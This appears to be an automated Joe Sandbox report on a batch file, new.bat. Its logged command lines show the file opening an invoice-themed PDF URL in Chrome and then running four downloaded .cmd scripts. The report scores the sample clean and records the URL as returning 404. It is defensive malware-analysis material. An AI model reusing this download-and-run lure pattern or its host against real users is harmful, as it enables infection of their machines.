Edit tour

Windows Analysis Report
new.bat

Overview

General Information

Sample name:	new.bat
Analysis ID:	1446641
MD5:	bb09c4b01e76e689822717e2ffdb115d
SHA1:	7c9503233088afa72fde84b872cd11b672ac6131
SHA256:	0ffa30d24d62b4015f54ebe21732d240b252cc391c1d196d913bfff981648455
Tags:	bat
Infos:

Detection

Score:	2
Range:	0 - 100
Whitelisted:	false
Confidence:	60%

Signatures

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Sample execution stops while process was sleeping (likely an evasion)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6472 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 7224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2480,i,11551897311519012377,11188016322124477150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 7240 cmdline: cmd /c ""C:\Users\user\Downloads\kam.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7272 cmdline: cmd /c ""C:\Users\user\Downloads\las.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7316 cmdline: cmd /c ""C:\Users\user\Downloads\zap.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7364 cmdline: cmd /c ""C:\Users\user\Downloads\xff.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://s2r.tn/cgi/INVOICERVSHA.pdf

HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.95.31.18:443 -> 192.168.2.4:64816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:64819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:64820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:64821 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.4:64815 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 70.38.21.234 70.38.21.234
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 13.95.31.18
Source: unknown	TCP traffic detected without corresponding DNS query: 13.95.31.18
Source: unknown	TCP traffic detected without corresponding DNS query: 13.95.31.18
Source: unknown	TCP traffic detected without corresponding DNS query: 13.95.31.18
Source: unknown	TCP traffic detected without corresponding DNS query: 13.95.31.18
Source: unknown	TCP traffic detected without corresponding DNS query: 13.95.31.18
Source: unknown	TCP traffic detected without corresponding DNS query: 13.95.31.18
Source: unknown	TCP traffic detected without corresponding DNS query: 13.95.31.18
Source: unknown	TCP traffic detected without corresponding DNS query: 13.95.31.18
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183

Source: global traffic	HTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s2r.tn/cgi/INVOICERVSHA.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2YlOHc98uO8EcM3&MD=X2zFsc+f HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-aliveAccept-Encoding: identitySec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2YlOHc98uO8EcM3&MD=X2zFsc+f HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2YlOHc98uO8EcM3&MD=X2zFsc+f HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: s2r.tn
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 16:32:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 16:32:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 16:32:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1

Source: new.bat

String found in binary or memory: https://s2r.tn/cgi/INVOICERVSHA.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 64817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64823
Source: unknown	Network traffic detected: HTTP traffic on port 64823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64825
Source: unknown	Network traffic detected: HTTP traffic on port 64825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64820
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64821

Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.95.31.18:443 -> 192.168.2.4:64816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:64819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:64820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:64821 version: TLS 1.2

Source: classification engine

Classification label: clean2.winBAT@29/4@9/8

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\kam.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\las.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\zap.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\xff.cmd""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2480,i,11551897311519012377,11188016322124477150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\kam.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\las.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\zap.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\xff.cmd""	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2480,i,11551897311519012377,11188016322124477150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\cmd.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\kam.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\las.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\zap.cmd""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ""C:\Users\user\Downloads\xff.cmd""	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	11 Process Injection	11 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 DLL Side-Loading	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
new.bat	0%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://s2r.tn/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s2r.tn	70.38.21.234	true	false	unknown
www.google.com	142.250.185.68	true	false	unknown
18.31.95.13.in-addr.arpa	unknown	unknown	false	unknown
50.23.12.20.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://s2r.tn/cgi/INVOICERVSHA.pdf	false		unknown
https://s2r.tn/favicon.ico	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.68	www.google.com	United States	15169	GOOGLEUS	false
70.38.21.234	s2r.tn	Canada	32613	IWEB-ASCA	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.8
192.168.2.7
192.168.2.16
192.168.2.9
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446641
Start date and time:	2024-05-23 18:31:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	new.bat
Detection:	CLEAN
Classification:	clean2.winBAT@29/4@9/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.186.142, 74.125.133.84, 34.104.35.123, 87.248.204.0, 192.229.221.95, 142.250.185.99, 142.250.186.110, 142.250.185.142
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: new.bat

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: https://s2r.tn/cgi/INVOICERVSHA.pdf Model: Perplexity: mixtral-8x7b-instruct	{ "loginform": false, "reasons": [ "The text 'Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.' does not indicate the presence of a login form.", "The text suggests that the requested URL is not found, which is not related to a login form." ] }
Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDument to handle the request.

Input

Output

URL: https://s2r.tn/cgi/INVOICERVSHA.pdf Model: Perplexity: mixtral-8x7b-instruct

{
"loginform": false,
"reasons": [
